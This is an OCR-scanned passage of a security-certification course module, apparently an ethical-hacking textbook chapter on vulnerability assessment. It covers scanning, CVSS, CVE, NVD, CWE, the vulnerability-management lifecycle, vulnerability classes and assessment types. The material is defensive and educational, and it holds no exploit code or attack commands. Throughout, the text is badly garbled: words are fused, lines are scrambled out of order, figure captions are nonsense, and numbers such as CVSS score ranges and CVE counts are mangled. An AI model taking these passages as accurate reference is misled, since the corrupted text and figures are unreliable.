Help (https://www_helpnetsecurity.com)
Net Security
HackerStorm(http://www.
hackerstorm.co.uk)
Computerworld(https://www.computerworld.com)
WindowsSecurity(http.//www.windowsecurity.com)
(https://www.d-crypt.com)
D’Crypt

Module
5 488
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 Assessment?
What is Vulnerability

{©Vuloerabtty
curt
assessmenti s anin-depth
procedures examination
ofthe
the of abit system
andcontra, withstand exlatation
or appliation
including
current

(©Ierecognzes,
and
messures, andclsies securty vulnerable na computer
sytem,network, communication

beusedto
‘may ‘vulnerability
scanner includes:

1 Proc theafectvenss ofadetionl security ports andruning services

‘open
fromstake ‘pletion services
and vlnerabities

Whatis Vulnerability
Assessment?
A.vulnerability
including
assessmentis an in-depth
current security
for knownsecurity
procedures
weaknesses,
examination of the ability a system
andcontrols,
and recognizes,
to withstand
measures,
exploitation.
andclassifies
of
or application,
It scansnetworks
security vulnerabilities
i n computersystems,networks, and communication channels. quantifies,
It identifies, and
rankspossiblevulnerabilitiesto threatsi n a system.Additionally,
it assistssecurity professionals
insecuringthe network byidentifying securityloopholes
or vulnerabilitiesi n the current
mechanism
security beforeattackersc an exploit
them.
vulnerability
assessmentmay beusedto:
Identify weaknessesthatcouldbe exploited
=
Predictthe effectiveness
of additionalsecuritymeasures i n protecting
information,
resourcesfromattack

Typically,
vulnerability-scanning
tools searchnetwork segments for IP-enableddevicesand
enumerate systems,
operatingsystems, and applications
to identifyvulnerabilities
resulting
fromvendornegligence, or day-to-day
systemor networkadministrationactivities, activities.
\Vulnerability-scanning
softwarescans the computeragainstthe CommonVulnerability
and
Exposures
(CVE) bulletinsprovided
indexandsecurity bythesoftwarevendor.
Vulnerability of identifying
scanners are capable the following
information:
‘=
The0S versionrunningon computers
or devices

=
IPandTransmissionControlProtocol/User
Datagram (TCP/UDP)
Protocol portsthat are
listening
Applications
installedon computers

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Accountswithweakpasswords
Filesandfolderswith weakpermissions
Defaultservices andapplications
that might
haveto beuninstalled
Errors i n the securityconfiguration
of common applications
exposed
Computers to knownor publicly
reported
vulnerabilities
EOL/EOS
softwareinformation
Missing
patchesandhotfixes
Weaknetworkconfigurations
andmisconfigured
or risky
ports
Help
to verify
of
the inventoryall devices on the network
Therk
1¢ approaches
are two
Active Scanning:
to
networkvulnerabilityscanning:
The attacker interacts directlywith the target network to find
vulnerabilities.Active scanninghelps i n simulating
an attackon the targetnetworkto
uncover vulnerabilities thatcan beexploited bytheattacker.
Example:
An attackersendsprobes
and specially
craftedrequests
to the targethostin
the network
to identify
vulnerabilities.
PassiveScanning: The attacker
tries to findvulnerabilities
withoutdirectly interacting
with the targetnetwork.Theattackeridentifiesvulnerabilitiesvia informationexposed
bysystemsduringnormalcommunications. Passivescanningidentifiesthe active
operating systems,applications,
and portsthroughout the targetnetwork, monitoring
Thisapproach
activityto determineits vulnerabilities. provides informationabout
weaknesses butdoesnot providea path for directly
combating attacks.
Example:
An attackerguesses systeminformation,
the operating applications,
and
andservice versions byobserving
application the TCPconnection setupandteardown.
Attackersscan for vulnerabilitiesusing tools such as Nessus,Qualys, GFl LanGuard,and
OpenvVAs.Vulnerability scanningenablesan attackerto identify
networkvulnerabilities,
open
portsand runningservices, applicationand services configuration
errors, and application
and
icevulnerabilities.
of Vulnerability
Limitations Assessment

f
The following
Vulnerability-scanning
ofvulnerability
are some ofthelimitations assessments:
softwareis limitedin its ability
to detectvulnerabilitiesat a given
point i n time
Vulnerability-scanning
softwaremust be updated when new vulnerabilities
a re
discovered are madeto the softwarebeing
or whenimprovements used
Softwareis onlyas effectiveas the maintenance performed
on it bythe softwarevendor
andbythe administratorwho usesit
Vulnerability doesnot measure the strength
Assessment of security
controls

05
Module Page£90 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 softwareitselfis not immune to software
Vulnerability-scanning engineeringflawsthat
might
leadto it missingserious vulnerabilities,
Human judgment is neededto analyze the dataafter scanningand identifying
the false
andfalsenegatives.
positives
Themethodology usedmighthave an impacto n the test results.Forexample, vulnerability
scanningsoftware that runs underthe security
context ofthedomain administratorwill yield
differentresultsthansoftwarethat runs underthe security
context of an authenticatedor non-
authenticateduser. Similarly,diversevulnerability-scanning
softwarepackages assesssecurity
differently
andhaveuniquefeatures.Thiscan influencethe assessmentresults.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Vulnerability
Scoring
Systems
and Databases

eenmrT,
|©aneny
| swnsquanttatve modeler esto ven the
.

ae cade cere

“e 708s

j
Scoring
Vulnerability and Databases(Cont'd) (CEH
Systems

Valnerabilitiesand
Exposures
(CVE)

avaiable
‘Apublidy
{ree-to-use
ditionaryof
listof
and

SearchResults

software
standardized identifiers
for common
vulnerabiitiesand
‘exposures

Gz

05
Module £92
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 j
Vulnerability
Scoring and Databases(Cont'd)CEH
Systems
Vulnerability
National Database (NVD)
NST

government
© AUS.
repository
af ||
base vulnerability
represented
using
‘Automation
management
the Security
Protocol
SCAP)
standards:
data
Content
ann

data
hese
theof
vulnerability
management,
enable automation
measurementa ndcompl
secuty

heNVDincludes
database
ofsecurity

Software
flaws, msconigurations,
names,a ndimpact
meres
product

NVD
j
Scoring
Vulnerability and Databases(Cont'd) (CEH
Systems

Common
Weakness
Enumeration
(CWE)
‘category
syst
software
vanerailties
for and

by
the
ts sponsored NationalCybersecurity

ofThe
MITRE
FFROC, which ownedby Corporation,
swithsupport
fom US-CERT andthe
National
Cyber
Division he U.S.
‘Security of
Department
Homeland
Security
thasover 600catogories
ofweaknesses,
ich
‘community
35a baseline
forweakness
‘dentifeation, andprevention
mitigation, afforts

QWE
3
‘Vulnerability
ScoringSystems and Databases EReeSR
of cyber-attacks,
Dueto the growingseverity vulnerability
research
hasbecome
criticalas it
helps the chanceof attacks.Vulnerability
to mitigate researchprovides
awareness of advanced
techniques
to identify
flawsor loopholes that can beexploited
in the software byattackers.
Vulnerability andvulnerability
scoring systems are usedbysecurity
databases analysts
to rank
information
system andto provide
vulnerabilities score oftheoverallseverity
a composite and

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Vulnerability
riskassociatedwith identifiedvulnerabilities. databases
collect and maintain
informationaboutvarious vulnerabilitiespresent
i n informationsystems,

Following
are some of the vulnerability anddatabases:
scoringsystems
Common
=
Vulnerability
Scoring
System (CVSS)
=

Common
Vulnerabilities
Exposures
and (CVE)
=

=
Vulnerability
National

Weakness
Common
(CWE)
(NVD)
Database
Enumeration
Common Vulnerability
Scoring (CVSS)
System
Source:https://www
first.org, https://nvd.nist.gov
CVSSis published
a standardthat provides an open frameworkfor communicating the
characteristics The system's
and impactsof IT vulnerabilities. quantitativemodelensures
repeatable, accurate measurement while enabling users to see the underlyingvulnerability
characteristicsthat were usedto generate the scores. Thus,CVSSis well suitedas a standard
measurement system for industries,
organizations,and governments that needaccurate and
consistent vulnerabilityimpactscores.Twocommon uses of CVSSare prioritizing vulnerability
remediationactivities and calculating the severityof vulnerabilitiesdiscoveredon one’s
systems.TheNational
vulnerabilities.
Vulnerability
Database (NVD) provides CVSS
for
scores almostallknown

CVSS
to
helps
representation
a
capturethe principal
reflectits severity.
(such
This numerical
as low,medium,
of vulnerability
characteristics
score can thereafter
high,or critical)
to help
andproduce

organizations
a numerical

properly
score
be translatedinto a qualitative
assess and

prioritize
CVSSvulnerability
processes.
consists
ofthe
their

metrics
management
vulnerabilities:
assessment three for measuring
+

‘+
qualities
BaseMetric: Representsinherent
Temporal
of a vulnerability
the featuresthat continue to change
Metric: Represents during
the lifetimeof
thevulnerability
EnvironmentalMetric: Represents are basedon a particular
vulnerabilitiesthat

Each
environment
or
implementation.
metric setsa score from110, with 10being
the most severe. TheCVSS s core is calculated
andgenerated bya vector string,whichrepresents
the numericalscore for eachgroup i n the
formof a block of text. TheCVSS
calculatorranksthe security andprovides
vulnerabilities the
andriskrelatedto the vulnerability
Userwith informationon theoverallseverity

Severity
Nor
BaseScoreRange
0.0
low 0139

‘Medium 4069

ical andCountermensores
Mackin ©by E-Comel
Copyright
 High
Critical
7.089
90-100
Table $3:
CVSS 3.0
ratings

Severity
low
BaseScoreRange
0.03.9

Medium
High
40-69
7.0-10
Table5.2:
CVSS
v2.0atings

§@
CommonVulnerability
Scoring Calculator
System CVE-2017-0144

Exploitability
Metrics

peace
Comoienty
rg ea
eae

ney mse
imc

Figur: Conn Vulnerability Stem aklatr

Scoring Version3
Common Vulnerabilities and Exposures
(CVE)
Source:https://eve.mitre.org
CVE®
is a publicly list or dictionary
availableand free-to-use of standardized
identifiers
for
common softwarevulnerabilitiesandexposures.Theuse of CVEIdentifiers, IDs,―
or “CVE which

ical andCountermensores
Mackin ©by E-Comel
Copyright
are assigned byCVENumbering Authorities
(CNAs) fromaroundthe world,ensures confidence
amongpartieswhen discussing or sharinginformationabout a unique softwareor firmware
vulnerability.CVEprovides for tool evaluationandenablesdata exchange
a baseline for
cybersecurity
organization's
automation. CVEIDsprovide
services so that userscan determine
needs.In short,products
a baselinefor evaluating

and services compatible

the coverage tools and
whichtools are most effectiveandappropriate
with CVEprovide
fortheir
better
of
coverage, easier interoperability,
andenhanced security.

What
CVE
is:
identifieror
=
One
exposure
for one vulnerability
=

description
Onestandardized

rather
Adictionary
=

than
adatabase
or
exposure for eachvulnerability

=
disparate
Amethodfor “speak―
language
databasesandtoolsto thesame
=
Thewayto interoperability
andbettersecuritycoverage

‘A
basis
Free among
for evaluation

public
forthe to download
services,

and use
tools,
anddatabases

Industry-endorsed Numbering
via the CVE Authorities,
CVEBoard,
and the numerous
products
andservicesthat includeCVE

TOTALCVE Entries:1 16175

Search Results
‘here
are
444
CVEentries that matchYoursearch

Descript

equests subject
toa relay attack

and allows
kyoceraCommandCenterRXTASKalf94501\ TASKalfa50S2<
remote at

5.2:Conon Vulerabltiesand Exposures

Figure (CVE)

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘abnrabiy
Analy

National Vulnerability
Database (NVD)
Source:https://nud.nist.gov
‘The
NVD is the U.S.government vulnerability
ofstandards-based
repository data.
management
It usesthe Security
ContentAutomationProtocol(SCAP).
Suchdataenablethe automation of
vulnerability
management, and compliance.
measurement,
security The NVD includes
databases checklistreferences,
of security softwareflaws,misconfigurations,
security-related
product
names,andimpact metrics.
TheNVDperforms an analysison CVEs thathavebeen published to the CVEDictionary.
NVD
staff are taskedwith the analysis of CVEsbyaggregating data pointsfrom the description,
references andanysupplemental
supplied, datathatare publicly available.Thisanalysis
results
In association impactmetrics (Common Vulnerability ScoringSystemCVSS), ~

vulnerability
types(Common Weakness Enumeration CWE),
—

and applicabilitystatements (Common

PlatformEnumeration CPE),
—

as well as other pertinentmetadata.TheNVDdoesnot actively

perform vulnerability
testing;it relieson vendors, third partysecurityresearchers,and
vulnerability to provide
coordinators informationthat is usedto assigntheseattributes,

NisT

WCVE-2019-6452
Det
Current Description

Figure3: showing
Screenshot CVEdetails
intheNational
ulnerabiltyDatabase
(VD)

Module
05 £97
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Common WeaknessEnumeration (CWE)
Source:httpsi//ewe.mitre.org
CommonWeakness Enumeration(CWE) is a categorysystemforsoftwarevulnerabilities and
weaknesses.It is sponsored bythe NationalCybersecurity FFRDC, whichis ownedbyTheMITRE
Corporation,with support from US-CERTand the NationalCyber SecurityDivisionof the U.S.
Department of HomelandSecurity. Thelatestversion 3.2of the CWEstandardwas releasedin
January 2019. It hasover 600 categories of weaknesses, whichgivesCWEthe ability to be
effectively
employed bythe community as a baselinefor weaknessidentification,
mitigation,
and prevention efforts.It also has an advancedsearchtechnique whereattackerscan search
and view weaknesses basedon researchconcepts, development concepts, and architectural
concepts.

Cc[E Common WeaknessEnumeration

‘About CWELIst_ Scoring Community

View the List of Weaknesses

bynatareh Concepts REE

SearchCWE
by ArhnctrlConcets

Figure5.4:Screenshot CWEresultsfr
showing SMBquery

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Life Cycle
Vulnerability-Management

‘Baseline
‘Vulnerability
Scan
ey,
Risk
Astessment

ey mR a
|
Verification Remediation

=
Life Cycle
‘Vulnerability-Management
The vulnerability management life cycleis an importantprocessthat helpsidentify and
remediatesecurity weaknesses before theycan be exploited. Thisincludesdefining the risk

posture
and policiesforan organization,
a
creatingcomplete assetlist of systems,
the environment for vulnerabilitiesandexposures,andtaking
assessing
vulnerabilitiesthat are identified.The implementation of a vulnerability
scanningand

management
the
action to mitigate
lifecycle
helpsgaina strategic perspective regardingpossiblecybersecurity
threatsandrendersinsecure
computing environments more resilientto attacks.
Vulnerability
management shouldbe implemented as it evaluatesand
i n every organization
controlsthe risksand vulnerabilitiesi n the system. The management process continuously
examines the ITenvironments forvulnerabilitiesandrisksassociated
with the system,
Organizationsshouldmaintain a proper vulnerability
managementprogram to ensure overall
informationsecurity.Vulnerability management the best results when it is
provides
implementedi n a sequenceof well-organized
phases.
Thephases
involvedin vulnerability
management
are:
=
Identify
AssetsandCreatea Baseline
Thisphase
identifies
criticalassetsandprioritizes
them to definethe riskbasedon the
criticality
and value of each system.This creates a goodbaselinefor vulnerability
management. This phase involvesthe gathering
of information
aboutthe identified
to understand
systems the approved ports,software,
drivers,
andbasicconfiguration
of
eachsystem
to
in order develop andmaintain a systembaseline.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Vulnerability
Scan
Thisphase is verycruciali n vulnerability management. analyst
In this step,the security
performsthe vulnerability scan on the network to identify
the knownvulnerabilitiesi n
the organization’s
infrastructure.Vulnerability scans can also be performed on
applicable
compliance templates to assess the organization's
Infrastructureweaknesses
the respective
against compliance guidelines.
RiskAssessment
In this phase,
all serious uncertainties that are associated
with the systemare assessed
andremediationis planned
andprioritized, to permanently eliminatesystem flaws.The
risk assessmentsummarizes the vulnerability
and risklevel identifiedfor eachof the
selectedassets.It determineswhetherthe risk levelfor a particular asset is high,
moderate, or low. Remediationis planned basedon the determinedrisk level. For
example, rankedhigh-risk
vulnerabilities are targetedfirstto decreasethe chancesof
exploitationthat wouldadversely
impactthe organization.
Remediation
Remediationis the processof applyingfixeso n vulnerablesystems i n orderto reduce
the impactand severityof vulnerabilities.This phaseis initiated after the successful
implementation
Verification
of
the baselineandassessmentsteps.

In this phase, team performs

the security a re-scan of systemsto assessif the required
remediationis complete and whetherthe individualfixes havebeen applied to the
impacted assets.Thisphase providesclearvisibility
into thefirmandallowsthe security
team to checkwhetherall the previous phases havebeenperfectly employed or not.
can be performed
Verification by using various means suchas ticketing systems,
scanners,andreports.
Monitor

Organizationsneedto performedregular
monitoringto maintain system security.They
use tools such as IDS/IPS
and firewalls.Continuousmonitoring identifies potential
threatsandany new vulnerabilities
that haveevolved. all
bestpractices,
As persecurity
phasesof vulnerability
management must be performed
regularly.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Pre-Assessment
Phase

Identity
Assatsand
Greate@
Chet an ivr eet ee
orien
te tes

Baseline

Pre-Assessment
Phase
Identify
AssetsandCreatea Baseline
The pre-assessment phaseis a preparatory phase, which involvesdefiningpoliciesand
standards,
procedures,of
clarifying
the scope the assessment,
and identifying
designing appropriate information
protection
critical assets to create a goodbaselinefor
and prioritizing
vulnerability
The
management,
following are the stepsinvolved a baseline:
i n creating
1. Identify
andunderstandbusiness
processes
2. Identify
the applications,
data,
andservices that support
the business
processesand
performcodereviews
Identify software,
the approved drivers,
andbasicconfiguration
of eachsystem
Createan inventoryof all assets,
andprioritize
or rankthe criticalassets

Understand the networkarchitectureandmapthe networkinfrastructure

Identify
thecontrolsalready
i n place

Understandpolicyimplementation standardcompliance
and practice with business
processes
Definethe scopeof the assessment
Createinformation to supporteffectiveplanning,
protectionprocedures scheduling,
coordination,
andlogistics

ical andCountermensores
Mackin ©by E-Comel
Copyright
Classify assetsaccording
the identified to thebusiness
needs.
Classification to identify
helps the
highbusinessrisksi n an organization.Prioritize the rated assetsbasedon the impactof their
failureand
their
Prioritizationhelps:
inthe
reliability business.

‘=
decide
Evaluateand

Examine
therisk
a
for
solution

level
tolerance
the consequenceof the
assets
failing

Organize
methods
for the
prioritizing assets

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AssessmentPhase
Vulnerability
‘amine
thesecurty
andevaluate phys

dent nd protiewneabites

dent fle poses

an
flenegatives

‘Vulnerability
AssessmentPhase
The vulnerabilityassessmentphase refersto identifyingvulnerabilitiesi n the organization's
infrastructure,includingthe operating system,web applications, and web server. It helps
identify the category of the vulnerability
and criticality in an organization and minimizes the
level of risk.The ultimate goal of vulnerabilityscanningis to scan, examine, evaluate, and
reportthevulnerabilitiesin the organization's
informationsystem.
Theassessmentphaseinvolvesexamining thearchitectureof the network,
evaluating
threatsto
the environment,performing
penetration testing,examiningand evaluatingphysical
security,
analyzingphysical operational
assets,assessing observing
security, policies
andprocedures,
and
interdependencies.
the infrastructure’s
assessing
involvedin the assessmentphase:
‘Steps
Examineandevaluatethe physical security
Checkfor misconfigurationsandhumanerrors
Runvulnerability
scans usingtools

or compliance
Selectthe typeof scan basedon the organization requirements
Identify
andprioritize
vulnerabilities
Identify
falsepositives
andfalsenegatives
Apply
thebusinessand technology
contextto scanner results
PerformOSINTinformationgathering
to validatethevulnerabilities
Createa vulnerability
scanreport

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PostAssessmentPhase
‘Risk
Assesement

PostAssessmentPhase
phase,
Thepost-assessment phase,
alsoknownas the recommendation is performed
afterand
basedo n risk assessment.Riskcharacterization
is categorized
bykeycriteria, which helps
the list ofrecommendations.
prioritize
Thetasksperformed phase
in the post-assessment include:
a priority listfor assessment
Creating recommendations analysis
basedon the impact
Developing an action plan to implementtheproposed
remediation
Capturinglessons learnedto improvethe complete
processi n the future

for
Conductingtraining employees
Postassessmentincludesriskassessment, remediation,
verification,
andmonitoring,
Risk Assessment
In theriskassessmentphase,
risksare identified,characterized, along
andclassified with
the techniquesusedto controlor reducetheir impact.It is an importantsteptoward
the
identifyingsecurity
Thetasksperformed
weaknesses i n the IT architecture

include:
in the riskassessmentphase
of an organization

basedon riskranking
Performriskcategorization (forexample,
critical,
high,
medium, andlow)
thelevelof impact
‘Assess
Determinethe threatandrisklevels

ical andCountermensores
Mackin ©by E-Comel
Copyright
Remediation
Remediation refersto the stepstaken to mitigatethe identifiedvulnerabilities.These
includestepslike evaluating vulnerabilities,locating and designing
risks, responses for
measurable,
vulnerabilities,It is importantfor the remediationprocessto be specific,
relevant,
attainable, andtime-bound.
Thetasksperformed in the remediationphaseinclude
Prioritizeremediationbasedo n theriskranking

Developan action plan

to implement
the recommendation
or remediation
Performa root-causeanalysis
Apply
patches
andfixes
lessons
Capture learned
Conduct
awarenesstraining
handling
Performexception andriskacceptance
for the vulnerabilitiesthat cannot
be remediated
Verification
Theverificationphase helps analysts
security verifythe applied
fixesthat remediatea
vulnerability byre-scanningthe systems.
In this phase,securityanalysts also verify
whetherall previousphases havebeenperfectly implemented.Thisphase includesthe
of
verification the remediesusedto mitigate
Thetasksperformed
in theverification
risks.
phaseinclude
©
Rescanning
systems
to
identify
the
applied
vulnerability
if an fixiseffective
i n remediating
the

>
Performing
dynamic analysis
© Reviewing

Monitoring
the
attack
surface

Thisphase
performs using toolssuchas IDS/IPS,
incidentmonitoring SIEM,
andfirewall.
Itimplements
continuous security to thwartever-evolving
monitoring threats.
Thetasksperformed phase
in the monitoring include:
©.

©.
Periodic
scan
Timely and
vulnerability
remediation
identifiedof
assessment
vulnerabilities
© Monitoring logs
intrusion detectionandintrusion prevention
© Implementing
policies,
procedures,andcontrols,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

aseerment
Typee
Classification
‘Vulnerability and

Assessment
Reports
‘Vulnerability

Classification and Assessment Types

Vulnerability
Anyvulnerability
that is presentin a systemcan be hazardous andcan causesevere damage to
It is importantfor ethicalhackersto have knowledge
the organization. about various typesof
vulnerabilitiesthat theycan employ,
alongwith various vulnerability
assessmenttechniques.
the various typesof vulnerabilitiesand vulnerability
Thissection i n the modulediscusses
assessments,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Classification
Vulnerability
oe
Miscontgurtion
oe
Default
installations utter Overtows
as
= 32
o
Servers
Unpatehed

ie]
Flaws
Design

fo
operating
&
Stem

oe Flaws
Application
o
OpenServices
oe
Default
Pasowords

a [ea]
is]

Classification
Vulnerability
Vulnerabilitiespresent into the following
or networkare classified
i n a system categories:
=
Misconfiguration
Misconfiguration
is the most common vulnerability causedbyhuman
andis mainly
It mayhappen
error,whichallowsattackersto gainunauthorizedaccessto the system.
or unintentionally
intentionally and affects web servers, application platforms,
databases,andnetworks.
Thefollowing
are some examples
of misconfiguration
0 running
An application
with
debug
enabled
portsthatare open foran application
administrative
Unnecessary
outdated
Running softwareo n the system

Running serviceson a machine

unnecessary
Outboundconnectionsto various Internet services

misconfigured
Using SSLcertificates
or defaultcertificates

authenticated
Improperly externalsystems
Incorrectfolderpermissions
Defaultaccountsor passwords
Setup or configuration
pagesenabled
Disabling andfeatures
settings
security

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackerscan easilydetect these misconfigurations
usingscanningtoolsand then
exploitthe backendsystems. Therefore,
the administratorsmust change
the default
configuration
ofdevicesandoptimizedevice
security.
DefaultInstallations
Defaultinstallationsa re usually
user-friendlyespecially
—
whenthedeviceis being used

forthe firsttime whentheprimaryconcern is theusability

device’s
ofthedeviceratherthan the
security.In some cases, infected devicesmay not contain any valuable
information, but are connected to networksor systemsthat haveconfidential
informationthat wouldresultin a databreach.Falling to change the default settings
while deploying the softwareor hardwareallowsthe attackerto guessthe settings to
breakinto the system.
BufferOverflows
Bufferoverflowsare common softwarevulnerabilitiesthat happen
dueto coding
errors
thatallowattackersto gainaccessto thetargetsystem.
In a bufferoverflowattack,
the
attackersunderminethe functioning of programsand try to takecontrolof the system
bywritingcontent beyond the allocatedsize of the buffer.Insufficient
boundschecking
i n the programis the root cause. Thebuffer is not ableto handledata beyond its limit,
causingthe flow of datato adjacent memorylocations andoverwritingtheirdata
values.Systems often crash, becomeunstable, or showerratic program behaviorwhen

bufferoverflowoccurs.
Unpatched
Servers
Serversa re an essentialcomponent of the infrastructureof any organization. Thereare
severalc ases whereorganizations run unpatched and misconfigured servers that
compromise the security and integrity of the data in their system.Hackerslook out for

an them.
thesevulnerabilitiesi n the servers and exploit As theseunpatched servers are a

for
hub the attackers,

softwareregularly
theyserve
as
and maintaining
entrypointinto the network.Thiscan leadto the
exposureof privatedata,financialoss,and discontinuationof operations.
systems properly bypatching
Updating
and fixingbugs c an
thevulnerabilitiescausedbyunpatched
helpi n mitigating servers.

Design
Flaws
Vulnerabilitiesdue to design flawsare universal
to all operating devicesand systems.
Designvulnerabilitiessuchas incorrect encryption
or the poor validationof datareferto
flawsin the functionality
logical exploitto bypass
of the systemthat attackers the
detectionmechanismandacquire access to a secure system.
Operating F
System laws
Dueto vulnerabilities
i n the operatingsystems,applications
suchas trojans,
worms, and
posethreats.Theseattacksuse maliciouscode,
viruses script,or unwantedsoftware,
whichresultsin the lossof sensitive informationandcontrolof computer operations.
Timelypatching of the OS,installing minimal software applications,
and using

ical andCountermensores
Mackin ©by E-Comel
Copyright
applications
withfirewallcapabilities
are essential
stepsthat an administrator
must take
to protectthe OSfromattacks.
Application
Flaws
Application
flawsare vulnerabilities that are exploited
i n applications bythe attackers.
Applications shouldbe securedusing the validationand authorizationof the user.
Flawedapplications pose security threatssuchas datatampering andunauthorized
access to configuration stores. If the applicationsare not secured,
sensitive information
maybe lostor corrupted. Hence, developers mustunderstand theanatomy of common
security vulnerabilitiesanddevelop highlys ecure applications
byproviding properuser
validationandauthorization.

Open
Services
Open
portsandservices mayleadto the lossof dataor DoSattacksandallowattackers
to perform
further attacks on other connecteddevices.Administrators must
checkforunnecessary
continuously or insecure portsand services to reducethe riskto
the network
DefaultPasswords
Manufacturers provide users with defaultpasswords to access the deviceduring its
whichusers must change
initial set-up, for future use. Whenusers forget to update the
passwords andcontinue usingthedefaultpasswords, theymakedevicesandsystems
vulnerableto various attacks,suchas brute force and dictionary attacks.Attackers
exploitthis vulnerabilityto obtain accessto the system. Passwords shouldbe kept

easily a
confidential;failing
compromised
to protectthe confidentiality
of password allowsthe system to be

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Vulnerability
Types Assessment
‘etive
Assessment PassiveAssessment

Host-based Assessment Network-based

Assessment

‘pplication
Assessment Database
A ssessment

ny outted
msconguraton omen or own ‘ORACLE,
POSTEAESL
ce
for Ne reser

Types
of Vulnerability
Assessment (Cont'd)

WirelessNetworkAssessment DistributedAssessment

wireless
networks lent
andserver
appropriate techniques
syncronization
simultaneously
applations, hough

CredontiatodAssossment Non-Crodentialed
A ssessment

‘i inthe network

machines present credentials
oftheassetspresent
nthe enterpse

‘Manual
Aesossment [Automated
Assossment
In ths

ulnrabilty
typeof assessment,theethical

Score, et
hacker
manually In thistypeof assessment,

‘Quays,
GF LanGuaed
the ethical
hecker
employs

‘Types
of Vulnerability
Assessment
Givenbeloware thedifferent
typesofvulnerability
assessments:
Active Assessment
A typeof vulnerabilityassessmentthat uses network scanners to identifythe hosts,
in a network.Activenetworkscanners can reduce
services, andvulnerabilitiespresent
the intrusiveness of thecheckstheyperform,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Passive
Assessment
Passiveassessmentssniff the traffic presento n the network to identify the active
systems,network services, applications,
and vulnerabilities.Passive assessmentsalso
provide
alist
of
the are
ExternalAssessment
currently
accessing
users who the network.

Externalassessmentexamines the networkfrom a hacker'spointof view to identify

andvulnerabilities
exploits accessible
to the outsideworld,Thesetypesof assessments
use externaldevicessuchas firewalls,
routers,and servers. An externalassessment
estimates the threat of networksecurity
attacksfrom outsidethe It
organization.
of of
determinesthe level securitythe externalnetworkandfirewall
Thefollowingare some of the possible i n performing
steps an externala ssessment:

©. Determinea set of rulesforfirewallandrouter configurations

fortheexternal
network
‘Check
whethertheexternalserver devicesandnetworkdevicesare mapped
Identify
openportsand relatedserviceson the externalnetwork
thepatch
Examine levelson the server andexternalnetworkdevices
suchas IDS,
Reviewdetectionsystems firewalls,
andapplication-layer
protection
systems
Get information
on DNSzones
theexternalnetworkthrough
‘Scan toolsavailable
of proprietary
a variety o n the
Internet
ExamineWebapplications
suchase-commerce andshopping
cart software
for
vulnerabilities
InternalAssessment
‘An the internal network to find exploits
internal assessmentinvolvesscrutinizing and
vulnerabilities.The following
are some of the possible
stepsin performing
an internal
assessment:
©. Specify
the open portsandrelatedservices on network servers, and
devices,
systems
Checkthe router configurations andfirewallrulesets
Listthe internalvulnerabilitiesof the operating
systemandserver
‘Scan
any
for trojans thatmaybepresent
Checkthe patch
i n the internal

levelson the organization’s

environment.
internalnetworkdevices,servers, and
systems
for
Check the existenceof malware, anddocumentthem
spyware,andvirus activity

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the physical
Evaluate security
Identify
andreview the remote management andevents
process
the file-sharing
‘Assess mechanisms NFSandSMB/CIFS
(forexample, shares)
© Examinethe antivirus implementation
andevents
Host-based
Assessment
Host-based
assessmentsare a type of securitycheckthat involve conducting
a
configuration-level
check to identifysystemconfigurations,
user directories,file
to evaluate the possibility
systems,registrysettings,and other parameters of
compromise. Theseassessmentscheckthe security of a particular
network or server.
Host-based s canners assess systemsto identify vulnerabilities
such as native
configurationtables, or file permissions,andsoftwareconfiguration
incorrect registry
errors, Host-basedassessmentsu se manycommercial andopen-source scanningtools.
Network-based
Assessment
Networkassessmentsdeterminethe possible networksecurity attacksthat may occur
on an organization's system. Theseassessments discovernetwork resources and map
the portsand services running to various areas on the network.It evaluatesthe
organization's system for vulnerabilitiessuchas missingpatches, unnecessary services,
weak authentication, and weak encryption. Network assessmentprofessionals use
firewallsand network scanners, suchas Nessus.Thesescanners identify open ports,
recognize the services runningon thoseports,anddetectvulnerabilities associated with
theseservices. Theseassessmentshelp identify
organizations pointsof entry andattack
into a network since theyfollowthe pathand approach of the hacker.Theyhelp
organizations determinehow systems are vulnerableto Internet and intranet attacks,
andhow an attackercan gain access to importantinformation. A typical network
assessmentconducts the followingtests on a network:
©.
Checks
topologies
router
filtering
Examines
the
inappropriate configuration
thenetwork for
rules
firewall

Identifies
inappropriately
configured
databaseservers
Testsindividualservices andprotocols SNMP,
suchas HTTP, andFTP
ReviewsHTML source codefor unnecessaryinformation
0 Performsbounds
Application
Assessment
checkingon variables

{Anapplication
assessmentfocuses Webapplications,
o n transactional traditionalclient-
server applications,
and hybridsystems. all elementsof an application
It analyzes
infrastructure,
including deployment and communication within the clientand server.
Thistypeof assessmentt ests the webserverinfrastructurefor any misconfiguration,
outdatedcontent,or knownvulnerabilities. professionals
Security use bothcommercial
andopen-source toolsto performsuchassessments.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Database
Assessment
‘A
databaseassessmenti s any assessmentfocusedon testingthe databasesfor the
presence of any misconfiguration Theseassessmentsmainly
or knownvulnerabilities.
concentrate on
POSTGRESQL
professionals
testing
various databasetechnologies
to identify
like MYSQL,MSSQL, ORACLE,and
data exposure or injectiontypevulnerabilities.Security
use bothcommercial andopen-sourcetoolsto performsuchassessments.
WirelessNetworkAssessment
Wirelessnetwork assessment determinesthe vulnerabilitiesi n an organization's
wirelessnetworks.In the past,wirelessnetworksusedweak anddefectivedata
encryption mechanisms. Now,wirelessnetworkstandardshave evolved, but many
networksstill use weakand outdatedsecurity mechanismsand are open to attack
Wirelessnetwork assessmentstry to attackwirelessauthenticationmechanisms and
gainunauthorized access.Thistypeof assessmenttestswireless networks andidentifies
rogue networksthat may exist within an organization'sperimeter.Theseassessments
auditclient-specified
sites with a wirelessnetwork. Theysniffwirelessnetworktraffic
and tryto crackencryption keys. Auditorstest othernetworkaccessif theygainaccess
